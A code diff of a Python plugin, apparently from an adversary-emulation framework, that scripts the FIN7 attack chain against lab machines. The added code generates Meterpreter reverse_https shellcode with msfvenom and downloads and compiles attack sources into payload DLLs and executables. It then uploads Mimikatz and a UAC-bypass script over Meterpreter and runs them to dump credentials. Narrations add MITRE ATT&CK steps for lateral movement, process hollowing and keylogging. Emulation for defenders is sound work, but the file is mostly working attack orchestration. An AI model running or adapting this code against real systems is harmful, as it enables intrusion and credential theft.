@ -4,7 +4,7 @@
from plugins . base . attack import AttackPlugin
from plugins . base . attack import AttackPlugin
from app . interface_sfx import CommandlineColors
from app . interface_sfx import CommandlineColors
from app . metasploit import MSFVenom , Metasploit
from app . metasploit import MSFVenom , Metasploit Instant
import os
import os
import time
import time
@ -32,13 +32,29 @@ class FIN7Plugin(AttackPlugin):
if self . metasploit_1 :
if self . metasploit_1 :
return self . metasploit_1
return self . metasploit_1
self . metasploit_1 = Metasploit ( self . metasploit_password , attack_logger = self . attack_logger , attacker = self . attacker_machine_plugin , username = self . metasploit_user )
self . metasploit_1 = Metasploit Instant ( self . metasploit_password , attack_logger = self . attack_logger , attacker = self . attacker_machine_plugin , username = self . metasploit_user )
self . metasploit_1 . start_exploit_stub_for_external_payload ( payload = self . payload_type_1 )
self . metasploit_1 . start_exploit_stub_for_external_payload ( payload = self . payload_type_1 )
self . metasploit_1 . wait_for_session ( )
self . metasploit_1 . wait_for_session ( )
return self . metasploit_1
return self . metasploit_1
def step1 ( self ) :
def step1 ( self ) :
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 1 (target hotelmanager): Initial Breach { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 1 (target hotelmanager): Initial Breach { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 1 (target hotelmanager): Initial Breach \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* RTF with VB payload ( needs user interaction )
* playoad executed by mshta
* mshta build js payload
* mshta copies wscript . exe to ADB156 . exe
* winword . exe spawns verclsid . exe ( a normal tool that can download stuff , no idea yet what it is used for here )
* mshta uses taskschd . dll to create a task in 5 minutes
This is the initial attack step that requires user interaction . Maybe it is better to reproduce those steps separately . They seem to be quite standard for any Ransomware infection .
""" )
# TODOS: No idea if we can replicate that automated as those are manual tasks
# TODOS: No idea if we can replicate that automated as those are manual tasks
# RTF with VB payload (needs user interaction)
# RTF with VB payload (needs user interaction)
@ -52,6 +68,19 @@ class FIN7Plugin(AttackPlugin):
def step2 ( self ) :
def step2 ( self ) :
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 2 (target hotelmanager): Delayed Malware Execution { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKBLUE } Step 2 (target hotelmanager): Delayed Malware Execution { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 2 (target hotelmanager): Delayed Malware Execution \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET
* scheduled task spawns Adb156 . exe via svchost https : / / attack . mitre . org / techniques / T1053 / 005 /
* Adb156 . exe loads scrobj . dll and executes sql - rat . js via jscript https : / / attack . mitre . org / techniques / T1059 / 007 /
* Adb156 . exe connects via MSSQL to attacker server
* WMI quieries for network information and system information https : / / attack . mitre . org / techniques / T1016 / and https : / / attack . mitre . org / techniques / T1082 / ( Caldera ? )
In this simulation sql - rat . js communication will be replaced by Caldera communication .
""" )
# scheduled task spawns Adb156.exe via svchost https://attack.mitre.org/techniques/T1053/005/
# scheduled task spawns Adb156.exe via svchost https://attack.mitre.org/techniques/T1053/005/
# Adb156.exe loads scrobj.dll and executes sql-rat.js via jscript https://attack.mitre.org/techniques/T1059/007/
# Adb156.exe loads scrobj.dll and executes sql-rat.js via jscript https://attack.mitre.org/techniques/T1059/007/
@ -63,6 +92,7 @@ class FIN7Plugin(AttackPlugin):
def step3 ( self ) :
def step3 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 3 (target hotelmanager): Target Assessment { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 3 (target hotelmanager): Target Assessment { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration ( " Step 3 (target hotelmanager): Target Assessment \n ---------------------------- " )
# TODO: Make sure logging is nice and complete
# TODO: Make sure logging is nice and complete
@ -72,16 +102,29 @@ class FIN7Plugin(AttackPlugin):
# Execute net view from spawned cmd https://attack.mitre.org/techniques/T1135/
# Execute net view from spawned cmd https://attack.mitre.org/techniques/T1135/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } new view { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } new view { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " deeac480-5c2a-42b5-90bb-41675ee53c7e " , parameters = { " remote.host.fqdn " : hotelmanager . get_ip ( ) } )
self . caldera_attack ( hotelmanager ,
" deeac480-5c2a-42b5-90bb-41675ee53c7e " ,
parameters = { " remote.host.fqdn " : hotelmanager . get_ip ( ) } ,
tactics = " Discovery " ,
tactics_id = " TA0007 " ,
situation_description = " The attackers got a bastion system infected and start to evaluate the value of the network " )
# check for sandbox https://attack.mitre.org/techniques/T1497/
# check for sandbox https://attack.mitre.org/techniques/T1497/
# The documentation does not define how it is checking exactly.
# The documentation does not define how it is checking exactly.
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } get-wmiobject win32_computersystem | fl model { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } get-wmiobject win32_computersystem | fl model { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " 5dc841fd-28ad-40e2-b10e-fb007fe09e81 " )
self . caldera_attack ( hotelmanager ,
" 5dc841fd-28ad-40e2-b10e-fb007fe09e81 " ,
tactics = " Defense Evasion " ,
tactics_id = " TA0005 " ,
situation_description = " There are many more ways to identify if the attacker is running in a VM. This is just one. " )
# query username https://attack.mitre.org/techniques/T1033/
# query username https://attack.mitre.org/techniques/T1033/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } query USERNAME env { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } query USERNAME env { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " c0da588f-79f0-4263-8998-7496b1a40596 " )
self . caldera_attack ( hotelmanager ,
" c0da588f-79f0-4263-8998-7496b1a40596 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 "
)
# TODO: query computername https://attack.mitre.org/techniques/T1082/
# TODO: query computername https://attack.mitre.org/techniques/T1082/
# self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1)
# self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}query COMPUTERNAME env{CommandlineColors.ENDC}", 1)
@ -90,17 +133,27 @@ class FIN7Plugin(AttackPlugin):
# TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/
# TODO: load adsldp.dll and call dllGetClassObject() for the Windows Script Host ADSystemInfo Object COM object https://attack.mitre.org/techniques/T1082/
# WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/
# WMI query for System Network Configuration discovery https://attack.mitre.org/techniques/T1016/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Network configuration discovery. Original is some WMI, here we are using nbstat { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Network configuration discovery. Original is some WMI, here we are using nbstat { CommandlineColors . ENDC } " , 1 )
self . caldera_attack ( hotelmanager , " 14a21534-350f-4d83-9dd7-3c56b93a0c17 " )
self . caldera_attack ( hotelmanager ,
" 14a21534-350f-4d83-9dd7-3c56b93a0c17 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 " )
# System Info discovery https://attack.mitre.org/techniques/T1082/
# System Info discovery https://attack.mitre.org/techniques/T1082/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } System info discovery, as close as it gets { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } System info discovery, as close as it gets { CommandlineColors . ENDC } " ,
1 )
1 )
self . caldera_attack ( hotelmanager , " b6b105b9-41dc-490b-bc5c-80d699b82ce8 " )
self . caldera_attack ( hotelmanager ,
" b6b105b9-41dc-490b-bc5c-80d699b82ce8 " ,
tactics = " Discovery " ,
tactics_id = " TA0007 " )
# CMD.exe->powershell.exe, start takeScreenshot.ps1 https://attack.mitre.org/techniques/T1113/
# CMD.exe->powershell.exe, start takeScreenshot.ps1 https://attack.mitre.org/techniques/T1113/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Take screenshot { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } Take screenshot { CommandlineColors . ENDC } " ,
1 )
1 )
self . caldera_attack ( hotelmanager , " 316251ed-6a28-4013-812b-ddf5b5b007f8 " )
self . caldera_attack ( hotelmanager ,
" 316251ed-6a28-4013-812b-ddf5b5b007f8 " ,
tactics = " Collection " ,
tactics_id = " TA0009 "
)
# TODO: Upload that via MSSQL transaction https://attack.mitre.org/techniques/T1041/
# TODO: Upload that via MSSQL transaction https://attack.mitre.org/techniques/T1041/
self . attack_logger . vprint (
self . attack_logger . vprint (
@ -125,12 +178,39 @@ class FIN7Plugin(AttackPlugin):
# Generate shellcode
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = " https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp "
architecture = " x64 "
target_platform = " windows "
payload = self . payload_type_1
lhost = self . attacker_machine_plugin . get_ip ( )
lport = " 443 "
filename = " babymetal.dll "
encoding = " base64 "
encoded_filename = " babymetal_encoded.txt "
sRDI_conversion = True
for_step = 4
logid = self . attack_logger . start_build ( dl_uri = dl_uri ,
architecture = architecture ,
target_platform = target_platform ,
payload = payload ,
lhost = lhost ,
lport = lport ,
filename = filename ,
encoding = encoding ,
encoded_filename = encoded_filename ,
sRDI_conversion = sRDI_conversion ,
for_step = for_step ,
comment = " This is the stager uploaded to the target and executed to get the first Meterpreter shell on the target network. " )
venom = MSFVenom ( self . attacker_machine_plugin , hotelmanager , self . attack_logger )
venom = MSFVenom ( self . attacker_machine_plugin , hotelmanager , self . attack_logger )
venom . generate_payload ( payload = self . payload_type_1 ,
venom . generate_payload ( payload = payload ,
architecture = " x64 " ,
architecture = architecture ,
platform = " windows " ,
platform = target_platform ,
lhost = self . attacker_machine_plugin . get_ip ( ) ,
lhost = lhost ,
lport = " 443 " ,
lport = lport ,
exitfunc = " thread " ,
exitfunc = " thread " ,
format = " c " ,
format = " c " ,
encrypt = " xor " ,
encrypt = " xor " ,
@ -141,7 +221,7 @@ class FIN7Plugin(AttackPlugin):
# get C source
# get C source
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_4; rm babymetal.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp " )
f " cd tool_factory/step_4; rm babymetal.cpp; wget { dl_uri } " )
# paste shellcode into C source
# paste shellcode into C source
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
@ -150,13 +230,15 @@ class FIN7Plugin(AttackPlugin):
# Compile to DLL
# Compile to DLL
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_4; sed -i ' s/#include <Windows.h>/#include <windows.h>/g ' babymetal_patched.cpp " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_4; sed -i ' s/#include <Windows.h>/#include <windows.h>/g ' babymetal_patched.cpp " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o babymetal.dll " )
f " cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o { filename } " )
# sRDI conversion
# sRDI conversion
self . attacker_machine_plugin . remote_run ( " cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/ babymetal.dll " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/ { filename } " )
# base64 conversion
# base64 conversion
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_4; base64 babymetal.bin > babymetal_encoded.txt " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_4; base64 babymetal.bin > { encoded_filename } " )
self . attack_logger . stop_build ( logid = logid )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKGREEN } Step 4 compiling tools { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKGREEN } Step 4 compiling tools { CommandlineColors . ENDC } " , 1 )
@ -168,7 +250,15 @@ class FIN7Plugin(AttackPlugin):
"""
"""
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 4 (target hotelmanager): Staging Interactive Toolkit { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 4 (target hotelmanager): Staging Interactive Toolkit { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 4 (target hotelmanager): Staging Interactive Toolkit \n ---------------------------- " )
self . attack_logger . start_narration ( """
In the original attack Babymetal payload is a dll . Currently we are using a simplification here ( directly calling a exe ) . The original steps are :
* Target already runs adb156 . exe . This one gets the shellcode over the network connection and decodes it .
* adb156 . exe executes cmd . exe which executes powershell . exe . It decodes embedded dll payload https : / / attack . mitre . org / techniques / T1059 / 003 / and https : / / attack . mitre . org / techniques / T1059 / 001 /
* Powershell cmdlet Invoke - Expression executes decoded dll https : / / attack . mitre . org / techniques / T1140 /
* The script invoke - Shellcode . ps1 loads shellcode into powershell . exe memory ( Allocate memory , copy shellcode , start thread ) ( received from C2 server ) https : / / attack . mitre . org / techniques / T1573 /
""" )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Create babymetal replacement { CommandlineColors . ENDC } " ,
f " { CommandlineColors . OKCYAN } Create babymetal replacement { CommandlineColors . ENDC } " ,
1 )
1 )
@ -208,6 +298,8 @@ class FIN7Plugin(AttackPlugin):
def step5 ( self ) :
def step5 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 5 (target hotelmanager): Escalate Privileges { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 5 (target hotelmanager): Escalate Privileges { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 5 (target hotelmanager): Escalate Privileges \n ---------------------------- " )
hotelmanager = self . get_target_by_name ( " hotelmanager " )
hotelmanager = self . get_target_by_name ( " hotelmanager " )
@ -216,18 +308,27 @@ class FIN7Plugin(AttackPlugin):
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute ps -ax through meterpreter { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute ps -ax through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ " ps -ax " ] , hotelmanager ) )
print ( metasploit . ps_process_discovery ( hotelmanager ,
situation_description = " The processes found here are not directly used (terminated, infected, ...). This is just a basic discovery step. " ,
countermeasures = " None possible. This is a very standard behaviour. Could be interesting after some data on process behaviour got aggregated as additional info snippet. " )
)
# powershell: GetIpNetTable() does ARP entries https://attack.mitre.org/techniques/T1016/
# powershell: GetIpNetTable() does ARP entries https://attack.mitre.org/techniques/T1016/
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Execute arp through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Execute arp through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ " arp " ] , hotelmanager ) )
# print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
print ( metasploit . arp_network_discovery ( hotelmanager ,
situation_description = " Ready for first network enumeration " ,
countermeasure = " Maybe detect direct arp access. Should be uncommon for normal tools. " ) )
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
# TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
itadmin = self . get_target_by_name ( " itadmin " ) . get_ip ( )
itadmin = self . get_target_by_name ( " itadmin " )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute nslookup through meterpreter { CommandlineColors . ENDC } " , 1 )
self . attack_logger . vprint ( f " { CommandlineColors . OKCYAN } Execute nslookup through meterpreter { CommandlineColors . ENDC } " , 1 )
cmd = f " execute -f nslookup.exe -H -i -a ' { itadmin } ' "
# cmd = f"execute -f nslookup.exe -H -i -a '{itadmin}'"
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager ) )
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager))
print ( metasploit . nslookup ( hotelmanager , itadmin ,
situation_description = " Looking up info on the next target, the machine itadmin " ) )
# Copy step 5 attack tools to attacker
# Copy step 5 attack tools to attacker
@ -239,26 +340,51 @@ class FIN7Plugin(AttackPlugin):
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " samcat.exe " ) , " samcat.exe " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " samcat.exe " ) , " samcat.exe " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " uac-samcats.ps1 " ) , " uac-samcats.ps1 " )
self . attacker_machine_plugin . put ( os . path . join ( os . path . dirname ( self . plugin_path ) , " resources " , " step5 " , " uac-samcats.ps1 " ) , " uac-samcats.ps1 " )
print ( metasploit . meterpreter_execute_on ( [ " ls " ] , hotelmanager , delay = 10 ) )
print ( metasploit . meterpreter_execute_on ( [ " ls " ] , hotelmanager , delay = 10 ) )
cmd = " upload samcat.exe ' samcat.exe ' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
print ( cmd )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Uploading mimikatz through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Uploading mimikatz through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager , delay = 10 ) )
# cmd = "upload samcat.exe 'samcat.exe' "
# print(cmd)
cmd = " upload uac-samcats.ps1 ' uac-samcats.ps1 ' "
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager, delay=10))
print ( metasploit . upload ( hotelmanager , " samcat.exe " , " samcat.exe " ,
situation_description = " Uploading Mimikatz " ,
countermeasure = " File detection " ) )
# cmd = "upload uac-samcats.ps1 'uac-samcats.ps1' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
# cmd = "upload boring_test_file.txt 'samcat.exe' "
print ( cmd )
# print(cmd )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Uploading UAC bypass script through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Uploading UAC bypass script through meterpreter { CommandlineColors . ENDC } " , 1 )
print ( metasploit . meterpreter_execute_on ( [ cmd ] , hotelmanager , delay = 10 ) )
# print(metasploit.meterpreter_execute_on([cmd], hotelmanager, delay=10))
print ( metasploit . upload ( hotelmanager , " uac-samcats.ps1 " , " uac-samcats.ps1 " ,
delay = 10 ,
situation_description = " Uploading UAC bypass powershell script. This one will execute Mimikatz " ,
countermeasure = " File detection " ) )
# execute uac-samcats.ps1 This: spawns a powershell from powershell -> samcat.exe as high integrity process https://attack.mitre.org/techniques/T1548/002/
# execute uac-samcats.ps1 This: spawns a powershell from powershell -> samcat.exe as high integrity process https://attack.mitre.org/techniques/T1548/002/
execute_samcats = " execute -f powershell.exe -H -i -a ' -c ./uac-samcats.ps1 ' "
execute_samcats = " execute -f powershell.exe -H -i -a ' -c ./uac-samcats.ps1 ' "
print ( execute_samcats )
print ( execute_samcats )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKCYAN } Execute UAC bypass (and mimikatz) through meterpreter { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKCYAN } Execute UAC bypass (and mimikatz) through meterpreter { CommandlineColors . ENDC } " , 1 )
logid = self . attack_logger . start_metasploit_attack ( source = self . attacker_machine_plugin . get_ip ( ) ,
target = hotelmanager . get_ip ( ) ,
metasploit_command = execute_samcats ,
ttp = " T1003 " ,
name = " execute_mimikatz " ,
description = " Execute Mimikatz to access OS credentials " ,
tactics = " Credential Access " ,
tactics_id = " TA0006 " ,
situation_description = " Executing Mimikatz through UAC bypassing powershell " ,
countermeasure = " Behaviour detection "
)
print ( metasploit . meterpreter_execute_on ( [ execute_samcats ] , hotelmanager , delay = 20 ) )
print ( metasploit . meterpreter_execute_on ( [ execute_samcats ] , hotelmanager , delay = 20 ) )
self . attack_logger . stop_metasploit_attack ( source = self . attacker_machine_plugin . get_ip ( ) ,
target = hotelmanager . get_ip ( ) ,
metasploit_command = execute_samcats ,
ttp = " T1003 " ,
logid = logid )
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@ -284,14 +410,33 @@ class FIN7Plugin(AttackPlugin):
# --encrypt xor : xor encrypt the results
# --encrypt xor : xor encrypt the results
# --encrypt-key m : the encryption key
# --encrypt-key m : the encryption key
dl_uri = " https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c "
payload = self . payload_type_1
architecture = " x64 "
target_platform = " windows "
lhost = self . attacker_machine_plugin . get_ip ( )
lport = " 443 "
filename = " hollow.exe "
for_step = 6
logid = self . attack_logger . start_build ( dl_uri = dl_uri ,
architecture = architecture ,
target_platform = target_platform ,
payload = payload ,
lhost = lhost ,
lport = lport ,
filename = filename ,
for_step = for_step ,
comment = " This will be copied using paexec to the it admin host. It will spawn svchost.exe there and create a first Meterpreter shell on this PC. " )
# Generate shellcode
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 -f exe -o msf.exe
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 -f exe -o msf.exe
venom = MSFVenom ( self . attacker_machine_plugin , hotelmanager , self . attack_logger )
venom = MSFVenom ( self . attacker_machine_plugin , hotelmanager , self . attack_logger )
venom . generate_payload ( payload = self . payload_type_1 ,
venom . generate_payload ( payload = payload ,
architecture = " x64 " ,
architecture = architecture ,
platform = " windows " ,
platform = target_platform ,
lhost = self . attacker_machine_plugin . get_ip ( ) ,
lhost = lhost ,
lport = " 443 " ,
lport = lport ,
format = " exe " ,
format = " exe " ,
outfile = " msf.executable " )
outfile = " msf.executable " )
@ -302,7 +447,7 @@ class FIN7Plugin(AttackPlugin):
# Get ProcessHollowing.c
# Get ProcessHollowing.c
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_6; rm ProcessHollowing.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c " )
f " cd tool_factory/step_6; rm ProcessHollowing.c; wget { dl_uri } " )
self . attacker_machine_plugin . remote_run (
self . attacker_machine_plugin . remote_run (
" cd tool_factory/step_6; sed -i ' s/#include <Windows.h>/#include <windows.h>/g ' ProcessHollowing.c " )
" cd tool_factory/step_6; sed -i ' s/#include <Windows.h>/#include <windows.h>/g ' ProcessHollowing.c " )
@ -317,7 +462,9 @@ class FIN7Plugin(AttackPlugin):
# Compiled for 64 bit.
# Compiled for 64 bit.
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_6; rm hollow.exe; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_6; rm hollow.exe; " )
self . attacker_machine_plugin . remote_run ( " cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o hollow.exe " )
self . attacker_machine_plugin . remote_run ( f " cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o { filename } " )
self . attack_logger . stop_build ( logid = logid )
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKGREEN } Step 6 compiling tools { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKGREEN } Step 6 compiling tools { CommandlineColors . ENDC } " , 1 )
@ -325,7 +472,19 @@ class FIN7Plugin(AttackPlugin):
def step6 ( self ) :
def step6 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 6 (target hotelmanager -> itadmin): Expand Access { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 6 (target hotelmanager -> itadmin): Expand Access { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 6 (target hotelmanager and itadmin): Expand Access \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT
* powershell download : paexec . exe and hollow . exe https : / / attack . mitre . org / techniques / T1105 /
* spawn powershell through cmd
* We move to the itadmin host : Use password with paexec to move lateral to it admin host https : / / attack . mitre . org / techniques / T1021 / 002 /
* paexec starts temporary windows service and executes hollow . exe https : / / attack . mitre . org / techniques / T1021 / 002 /
* https : / / www . poweradmin . com / paexec /
* = > Lateral move to itadmin
* hollow . exe spawns svchost and unmaps memory image https : / / attack . mitre . org / techniques / T1055 / 012 /
* svchost starts data exchange
""" )
# This is meterpreter !
# This is meterpreter !
# powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
# powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
@ -375,6 +534,21 @@ class FIN7Plugin(AttackPlugin):
def step7 ( self ) :
def step7 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 7 on itadmin: Setup User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 7 on itadmin: Setup User Monitoring { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 7 (target itadmin): Setup User Monitoring \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED
* Start situation : Step 6 executed a meterpreter in hollow . exe We can fake that to be able to start with step 7 directly
* BOOSTWRITE does DLL Hijack within a propriteary piece of software ( Aloha Command Center )
* This is meterpreter !
* Emulating DLL hijacking functionality of BOOSTWRITE
* Create BOOSTWRITE meterpreter handler
* Create temporary HTTP server serving " B " as XOR Key
* hollow . exe meterpreter session dowloads BOOSTWRITE . dll to srrstr . dll https : / / attack . mitre . org / techniques / T1105 /
* cmd . exe spawns svchost . exe - > executes SystemPropertiesAdvanced . exe which executes srrstr . dll
* srrstr . dll spawns rundll32 . exe which communicates to metasploit . New shell !
""" )
# Start situation: Step 6 executed a meterpreter in hollow.exe We can fake that to be able to start with step 7 directly
# Start situation: Step 6 executed a meterpreter in hollow.exe We can fake that to be able to start with step 7 directly
# BOOSTWRITE does DLL Hijack within a propriteary piece of software (Aloha Command Center)
# BOOSTWRITE does DLL Hijack within a propriteary piece of software (Aloha Command Center)
@ -396,6 +570,18 @@ class FIN7Plugin(AttackPlugin):
def step8 ( self ) :
def step8 ( self ) :
self . attack_logger . vprint (
self . attack_logger . vprint (
f " { CommandlineColors . OKBLUE } Step 8 (target: itadmin as domain_admin): User Monitoring { CommandlineColors . ENDC } " , 1 )
f " { CommandlineColors . OKBLUE } Step 8 (target: itadmin as domain_admin): User Monitoring { CommandlineColors . ENDC } " , 1 )
self . attack_logger . start_narration (
" Step 8 (target itadmin): User Monitoring \n ---------------------------- " )
self . attack_logger . start_narration ( """
NOT IMPLEMENTED YET . MAYBE DO THIS PARTIAL . KEYLOGGING NEEDS USER INTERACTION .
( Screen spying and keylogging are already implemented as standalone metasploit attacks . Use them )
* Meterpreter migrates to explorer . exe ( from svchost ) https : / / attack . mitre . org / techniques / T1055 /
* screenspy for screen capture https : / / attack . mitre . org / techniques / T1113 /
* migrate session to mstsc . exe https : / / attack . mitre . org / techniques / T1056 / 001 /
* deploy keylogger https : / / attack . mitre . org / techniques / T1056 / 001 /
* create a RDP session from itadmin - > accounting using stolen credentials
""" )
# This is meterpreter !
# This is meterpreter !
@ -405,6 +591,8 @@ class FIN7Plugin(AttackPlugin):
